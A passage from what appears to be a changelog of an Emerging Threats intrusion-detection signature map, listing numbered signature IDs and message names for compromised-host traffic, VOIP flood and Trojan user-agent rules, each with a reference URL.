url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510241 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510244 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510245 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510247 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510252 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510253 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510254 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510255 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510256 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510257 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510258 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510259 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510260 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510261 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510262 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510263 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510264 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510265 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510266 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510267 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510268 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510269 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510270 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510271 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510272 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510273 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510274 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510275 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510276 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510277 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510278 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510279 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510280 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510281 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510282 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510283 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510284 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (143) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510285 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (143) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510286 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (144) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510287 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (144) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510288 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (145) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510289 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (145) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510290 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (146) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510291 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (146) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510292 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (147) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510293 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (147) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510294 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (148) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510295 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (148) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510296 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (149) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510297 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (149) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510298 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (150) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510299 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (150) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510300 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (151) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510301 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (151) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510302 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (152) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510303 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (152) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510304 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (153) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510305 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (153) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510306 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (154) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510307 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (154) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510308 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (155) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510309 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (155) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510310 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (156) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510311 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (156) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510312 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (157) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510313 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (157) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510314 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (158) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510315 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (158) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510316 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (159) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510317 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (159) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510318 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (160) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510319 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (160) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510320 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (161) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510321 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (161) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510322 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (162) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510323 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (162) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510324 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (163) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510325 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (163) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510326 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (164) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510327 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (164) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510328 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (165) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510329 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (165) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510330 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (166) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510331 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (166) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510332 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (167) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510333 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (167) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510334 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (168) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510335 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (168) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510336 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (169) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510337 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (169) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510338 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (170) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510339 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (170) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510340 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (171) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510341 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (171) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510342 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (172) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510343 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (172) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510344 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (173) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510345 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (173) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510346 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (174) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510347 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (174) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510348 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (175) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510349 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (175) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510350 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (176) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510351 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (176) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510352 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (177) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510353 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (177) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510354 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (178) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510355 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (178) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510356 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (179) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510357 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (179) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510358 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (180) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510359 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (180) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510360 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (181) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510361 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (181) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510362 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (182) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510363 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (182) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510364 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (183) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510365 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (183) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510366 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (184) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510367 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (184) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510368 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (185) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510369 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (185) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510370 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (186) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510371 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (186) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510372 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (187) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510373 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (187) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510374 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (188) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510375 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (188) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510376 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (189) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510377 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (189) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510378 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (190) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510379 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (190) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510380 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (191) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510381 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (191) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510382 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (192) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510383 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (192) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Removed from emerging-sid-msg.map.txt (304): 2003192 || ET VOIP INVITE Message Flood || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VOIP/VOIP_Flooding || url,doc.emergingthreats.net/2003192 2003193 || ET VOIP REGISTER Message Flood || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VOIP/VOIP_Flooding || url,doc.emergingthreats.net/2003193 2003194 || ET VOIP Multiple Unauthorized SIP Responses || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VOIP/VOIP_Unauth || url,doc.emergingthreats.net/2003194 2009685 || ET TROJAN Unkown Trojan User-Agent (5.1 07:00 ...) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Unknown || url,doc.emergingthreats.net/2009685 2500234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500241 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500244 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500245 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500247 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500252 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500253 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500254 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500255 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500256 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500257 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500258 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500259 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500260 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500261 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500262 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500263 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500264 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500265 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500266 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500267 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500268 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500269 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500270 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500271 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500272 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500273 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500274 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500275 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500276 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500277 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500278 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500279 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500280 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500281 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500282 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500283 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500284 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (143) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500285 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (143) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500286 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (144) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500287 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (144) || 